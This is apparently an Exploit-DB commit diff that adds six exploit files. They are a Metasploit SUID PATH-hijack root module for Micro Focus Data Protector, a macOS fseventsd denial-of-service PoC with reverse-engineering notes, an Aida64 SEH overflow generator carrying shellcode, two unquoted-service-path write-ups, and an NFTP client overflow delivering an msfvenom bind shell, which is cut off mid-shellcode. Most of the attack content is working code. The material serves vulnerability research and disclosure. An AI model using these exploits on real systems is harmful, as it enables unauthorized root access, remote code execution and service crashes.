DB: 2019-11-05
6 changes to exploits/shellcodes Apple macOS 10.15.1 - Denial of Service (PoC) Aida64 6.10.5200 - Buffer Overflow (SEH) OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit) Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
This commit is contained in:
parent
47d2a76f4f
commit
577557762c
7 changed files with 695 additions and 0 deletions
134
exploits/linux/local/47580.rb
Executable file
134
exploits/linux/local/47580.rb
Executable file
|
@ -0,0 +1,134 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module exploits the trusted `$PATH` environment
|
||||
variable of the SUID binary `omniresolve` in
|
||||
Micro Focus (HPE) Data Protector A.10.40 and prior.
|
||||
|
||||
The `omniresolve` executable calls the `oracleasm` binary using
|
||||
a relative path and the trusted environment `$PATH`, which allows
|
||||
an attacker to execute a custom binary with `root` privileges.
|
||||
|
||||
This module has been successfully tested on:
|
||||
HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
|
||||
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
|
||||
|
||||
The vulnerability has been patched in:
|
||||
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
's7u55', # Discovery and Metasploit module
|
||||
],
|
||||
'DisclosureDate' => '2019-09-13',
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Micro Focus (HPE) Data Protector <= 10.40 build 118',
|
||||
upper_version: Gem::Version.new('10.40')
|
||||
]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PrependSetgid' => true,
|
||||
'PrependSetuid' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2019-11660' ],
|
||||
[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
|
||||
])
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def suid_bin_path
|
||||
datastore['SUID_PATH'].to_s
|
||||
end
|
||||
|
||||
def check
|
||||
unless setuid? suid_bin_path
|
||||
vprint_error("#{suid_bin_path} executable is not setuid")
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
info = cmd_exec("#{suid_bin_path} -ver").to_s
|
||||
if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
|
||||
version = '%.2f' % $1.to_f
|
||||
build = $3.to_i
|
||||
vprint_status("omniresolve version #{version} build #{build}")
|
||||
|
||||
unless Gem::Version.new(version) < target[:upper_version] ||
|
||||
(Gem::Version.new(version) == target[:upper_version] && build <= 118)
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
vprint_error("Could not parse omniresolve -ver output")
|
||||
CheckCode::Detected
|
||||
end
|
||||
|
||||
def exploit
|
||||
if check == CheckCode::Safe
|
||||
unless datastore['ForceExploit']
|
||||
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
|
||||
end
|
||||
end
|
||||
|
||||
unless writable?(base_dir)
|
||||
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
|
||||
end
|
||||
|
||||
payload_path = File.join(base_dir, 'oracleasm')
|
||||
register_file_for_cleanup(payload_path)
|
||||
write_file(payload_path, generate_payload_exe)
|
||||
chmod(payload_path)
|
||||
|
||||
trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
|
||||
register_file_for_cleanup(trigger_path)
|
||||
write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
|
||||
cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
|
||||
end
|
||||
end
|
237
exploits/macos/dos/47578.c
Normal file
237
exploits/macos/dos/47578.c
Normal file
|
@ -0,0 +1,237 @@
|
|||
# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
|
||||
# Date: 2019-11-02
|
||||
# Exploit Author: 08Tc3wBB
|
||||
# Vendor Homepage: Apple
|
||||
# Software Link:
|
||||
# Version: Apple macOS < 10.15.1 / iOS < 13.2
|
||||
# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
|
||||
# CVE : N/A
|
||||
# Type : DOS
|
||||
# https://support.apple.com/en-us/HT210721
|
||||
|
||||
----- Execution file path:
|
||||
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
|
||||
|
||||
fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.
|
||||
|
||||
----- Analysis
|
||||
|
||||
Env: macOS 10.14.6
|
||||
I named following pseudocode functions to help you understand the execution flow.
|
||||
|
||||
void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
|
||||
{
|
||||
...
|
||||
v9 = implementation_register_rpc(
|
||||
msg->msgh_local_port,
|
||||
msg[1].msgh_size,
|
||||
msg[4].msgh_reserved,
|
||||
(unsigned int)msg[4].msgh_id,
|
||||
*(_QWORD *)&msg[1].msgh_reserved, // input_mem1
|
||||
msg[2].msgh_size >> 2, // input_mem1_len
|
||||
*(_QWORD *)&msg[2].msgh_remote_port, // input_mem2
|
||||
msg[2].msgh_id, // input_mem2_len
|
||||
msg[5].msgh_remote_port,
|
||||
*(_QWORD *)&msg[3].msgh_bits, // input_mem3
|
||||
msg[3].msgh_local_port >> 2, // input_mem3_len
|
||||
*(_QWORD *)&msg[3].msgh_reserved, // input_mem4
|
||||
msg[4].msgh_size); // input_mem4_len
|
||||
...
|
||||
}
|
||||
routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0
|
||||
|
||||
And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2
|
||||
|
||||
I marked five places with: (1) (2) (3) (4) (5)
|
||||
These are the essential points cause this vulnerability.
|
||||
|
||||
void *fsevent_add_client(...)
|
||||
{
|
||||
...
|
||||
v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
|
||||
*(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
|
||||
...
|
||||
|
||||
v20 = ... // v20 point to an array of strings that was created based on user input
|
||||
|
||||
// The following process is doing recursive parsing to v20
|
||||
|
||||
index = 0LL;
|
||||
while ( 1 )
|
||||
{
|
||||
v26 = *(const char **)(v20 + 8 * index);
|
||||
|
||||
...
|
||||
|
||||
v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
|
||||
v27 = v26;
|
||||
if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
|
||||
goto LABEL_15;
|
||||
|
||||
if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
|
||||
goto LABEL_16;
|
||||
|
||||
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");
|
||||
|
||||
LABEL_17:
|
||||
if ( ++index >= input_mem1_len )
|
||||
goto LABEL_21;
|
||||
}
|
||||
|
||||
v27 = *(const char **)(v20 + 8 * index);
|
||||
LABEL_15:
|
||||
*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);
|
||||
|
||||
|
||||
LABEL_16:
|
||||
if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
|
||||
goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
|
||||
...
|
||||
|
||||
|
||||
// (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
|
||||
}
|
||||
|
||||
However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.
|
||||
|
||||
----- PoC
|
||||
|
||||
// clang poc.c -framework CoreFoundation -o poc
|
||||
|
||||
#include <stdio.h>
|
||||
#include <xpc/xpc.h>
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
#include <bootstrap.h>
|
||||
|
||||
mach_port_t server_port = 0;
|
||||
mach_port_t get_server_port(){
|
||||
if(server_port)
|
||||
return server_port;
|
||||
bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
|
||||
return server_port;
|
||||
}
|
||||
|
||||
int trigger_bug = 0;
|
||||
int has_reach_limit = 0;
|
||||
uint32_t call_routine_1(){
|
||||
|
||||
struct SEND_Msg{
|
||||
mach_msg_header_t Head;
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_port_descriptor_t port;
|
||||
mach_msg_ool_descriptor_t mem1;
|
||||
mach_msg_ool_descriptor_t mem2;
|
||||
mach_msg_ool_descriptor_t mem3;
|
||||
mach_msg_ool_descriptor_t mem4;
|
||||
// Offset to here : +104
|
||||
|
||||
uint64_t unused_field1;
|
||||
uint32_t input_num1; // +112
|
||||
uint32_t input_num2; // +116
|
||||
uint64_t len_auth1; // +120 length of mem1/mem2
|
||||
uint32_t input_num3; // +128
|
||||
uint64_t len_auth2; // +132 length of mem3/mem4
|
||||
|
||||
char unused_field[20];
|
||||
};
|
||||
|
||||
struct RECV_Msg{
|
||||
mach_msg_header_t Head; // Size: 24
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_port_descriptor_t port;
|
||||
uint64_t NDR_record;
|
||||
};
|
||||
|
||||
struct SEND_Msg *msg = malloc(0x100);
|
||||
bzero(msg, 0x100);
|
||||
|
||||
msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
|
||||
msg->Head.msgh_size = 160;
|
||||
int kkk = get_server_port();
|
||||
msg->Head.msgh_remote_port = kkk;
|
||||
msg->Head.msgh_local_port = mig_get_reply_port();
|
||||
msg->Head.msgh_id = 0x101D0;
|
||||
msg->msgh_body.msgh_descriptor_count = 5;
|
||||
|
||||
msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
|
||||
msg->mem1.deallocate = false;
|
||||
msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
|
||||
msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
|
||||
memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
|
||||
memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
|
||||
memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
|
||||
|
||||
mach_port_t port1=0;
|
||||
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
|
||||
|
||||
msg->port.name = port1;
|
||||
msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
|
||||
|
||||
uint64_t empty_data = 0;
|
||||
if(trigger_bug){
|
||||
|
||||
msg->input_num1 = 5;
|
||||
|
||||
msg->mem1.address = &empty_data;
|
||||
msg->mem1.size = 4;
|
||||
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
|
||||
|
||||
msg->mem2.address = "/.docid1";
|
||||
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
|
||||
}
|
||||
else{
|
||||
msg->input_num1 = 1;
|
||||
|
||||
msg->mem1.address = &empty_data;
|
||||
msg->mem1.size = 4;
|
||||
msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
|
||||
|
||||
msg->mem2.address = "/.dacid1";
|
||||
msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
|
||||
}
|
||||
|
||||
msg->mem3.address = 0;
|
||||
msg->mem3.size = 0;
|
||||
msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
|
||||
|
||||
msg->mem4.address = 0;
|
||||
msg->mem4.size = 0;
|
||||
|
||||
msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
|
||||
msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
|
||||
|
||||
mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
|
||||
|
||||
int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
|
||||
if(errCode == -21){
|
||||
has_reach_limit = 1;
|
||||
}
|
||||
|
||||
mig_dealloc_reply_port(msg->Head.msgh_local_port);
|
||||
struct RECV_Msg *recv_msg = (void*)msg;
|
||||
|
||||
uint32_t return_port = recv_msg->port.name;
|
||||
free(msg);
|
||||
|
||||
return return_port;
|
||||
}
|
||||
|
||||
int main(int argc, const char * argv[]) {
|
||||
|
||||
printf("PoC started running...\n");
|
||||
|
||||
uint32_t aaa[1000];
|
||||
for(int i=0; i<=1000; i++){
|
||||
if(has_reach_limit){
|
||||
trigger_bug = 1;
|
||||
call_routine_1();
|
||||
break;
|
||||
}
|
||||
aaa[i] = call_routine_1();
|
||||
}
|
||||
|
||||
printf("Finished\n");
|
||||
printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
|
||||
|
||||
return 0;
|
||||
}
|
70
exploits/windows/local/47574.py
Executable file
70
exploits/windows/local/47574.py
Executable file
|
@ -0,0 +1,70 @@
|
|||
# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
|
||||
# Date: 2019-10-28
|
||||
# Exploit Author: 8-Team / daejinoh
|
||||
# Vendor Homepage: https://www.aida64.com
|
||||
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
|
||||
# Version: AIDA64 Enginner 6.10.5200
|
||||
# Tested on: Windows 7 Home Basic SP1
|
||||
# CVE : N/A
|
||||
|
||||
# Step
|
||||
1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
|
||||
2) Paste payload from "aida64.txt" -> Apply
|
||||
3) File -> Exit
|
||||
|
||||
# Exploit Code
|
||||
#! Python
|
||||
|
||||
import struct
|
||||
|
||||
# shell code
|
||||
buf = ""
|
||||
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
|
||||
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
|
||||
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
|
||||
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
|
||||
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
|
||||
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
|
||||
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
|
||||
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
|
||||
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
|
||||
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
|
||||
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
|
||||
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
|
||||
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
|
||||
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
|
||||
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
|
||||
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
|
||||
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
|
||||
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
|
||||
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
|
||||
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
|
||||
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
|
||||
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
|
||||
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
|
||||
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
|
||||
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
|
||||
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
|
||||
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
|
||||
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
|
||||
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
|
||||
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
|
||||
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
|
||||
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
|
||||
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
|
||||
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
|
||||
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
|
||||
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
|
||||
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
|
||||
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
|
||||
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
|
||||
|
||||
# Exploit Payload
|
||||
sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
|
||||
sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET
|
||||
|
||||
payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000
|
||||
|
||||
f = open("aida64.txt", "wb")
|
||||
f.write(payload)
|
||||
f.close()
|
34
exploits/windows/local/47575.txt
Normal file
34
exploits/windows/local/47575.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
|
||||
# Discovery by: Luis Martinez
|
||||
# Discovery Date: 2019-11-03
|
||||
# Vendor Homepage: https://openvpn.net
|
||||
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
|
||||
# Tested Version: 3.0.0.(272)
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
|
||||
|
||||
OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto
|
||||
|
||||
# Service info:
|
||||
|
||||
C:\>sc qc agent_ovpnconnect
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: agent_ovpnconnect
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
|
38
exploits/windows/local/47577.txt
Normal file
38
exploits/windows/local/47577.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
|
||||
# Author: Gustavo Briseño
|
||||
# Date: 2019-11-03
|
||||
# Vendor Homepage: https://www.acer.com/
|
||||
# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
|
||||
# Version : Launch Manager 6.1.7600.16385
|
||||
# Tested on: Windows 7 Home Basic 64bit
|
||||
# CVE : N/A
|
||||
|
||||
# =====================================================
|
||||
# 1. Description:
|
||||
# Unquoted service paths in DsiWMIService have an unquoted service path.
|
||||
|
||||
#PoC
|
||||
===========
|
||||
C:\>sc qc DsiWMIService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: DsiWMIService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Dritek WMI Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\>
|
||||
|
||||
#Exploit:
|
||||
============
|
||||
A successful attempt would require the local user to be able to insert
|
||||
their code in the system root path undetected by the OS or other
|
||||
security applications where it could potentially be executed during
|
||||
application startup or reboot. If successful, the local user's code
|
||||
would execute with the elevated privileges of the application.
|
176
exploits/windows/remote/47576.py
Executable file
176
exploits/windows/remote/47576.py
Executable file
|
@ -0,0 +1,176 @@
|
|||
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
|
||||
# Date: 2019-11-03
|
||||
# Exploit Author: Chase Hatch (SYANiDE)
|
||||
# Vendor Homepage: http://ayukov.com/nftp/
|
||||
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
|
||||
# Version: 1.71
|
||||
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
|
||||
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
|
||||
# Steps to reproduce:
|
||||
# Run the server with the valid Windows version
|
||||
# Connect the client to the malicious server
|
||||
# bind shell on port 5150
|
||||
|
||||
#!/usr/bin/env python2
|
||||
import os, sys, socket
|
||||
|
||||
NARGS = len(sys.argv)
|
||||
|
||||
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
|
||||
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
|
||||
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
|
||||
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
|
||||
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
|
||||
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
|
||||
tourRETs = {
|
||||
"XPProSP3": "\x95\x3A\x92\x7c",
|
||||
"XPProSP2": "\x43\x75\x92\x7C",
|
||||
"XPProSP1": "\xc7\x41\xe6\x77",
|
||||
"XPProSP0": "\xf3\x67\xe6\x77"
|
||||
}
|
||||
|
||||
|
||||
if not NARGS > 1:
|
||||
print("USAGE: %s version" % sys.argv[0])
|
||||
print("[.] version must be in:")
|
||||
for item in tourRETs:
|
||||
print("\t%s" % item)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
|
||||
# ESP and ESI both pointers to somewhere in the As
|
||||
# If I increase the overflow string to 10000, the area ESP points to at crash
|
||||
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
|
||||
# sploit = "A"*10000
|
||||
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
|
||||
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
|
||||
sploit = "A"*4116
|
||||
|
||||
# Add the return address
|
||||
try:
|
||||
sploit += tourRETs[sys.argv[1]]
|
||||
except KeyError, x:
|
||||
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
|
||||
sys.exit(1)
|
||||
|
||||
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
|
||||
|
||||
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
|
||||
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
|
||||
|
||||
|
||||
# badchars = "\x00\x0a\x0d"
|
||||
# locate EIP and align ESP to a close future 4 and 16 byte boundary
|
||||
NOTES = """\
|
||||
$-37 > D9EE FLDZ
|
||||
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
|
||||
$-31 > 59 POP ECX
|
||||
$-30 > 80C1 09 ADD CL,9
|
||||
$-2D > 80C1 04 ADD CL,4
|
||||
$-2A > 80C1 2A ADD CL,2A
|
||||
$-27 > 80C5 01 ADD CH,1
|
||||
$-24 > 51 PUSH ECX
|
||||
$-23 > 5C POP ESP
|
||||
"""
|
||||
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
|
||||
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
|
||||
sploit += "\x90" * 0x22 # ESP = EIP
|
||||
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
|
||||
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
|
||||
sploit += (
|
||||
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
|
||||
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
|
||||
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
|
||||
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
|
||||
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
|
||||
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
|
||||
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
|
||||
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
|
||||
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
|
||||
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
|
||||
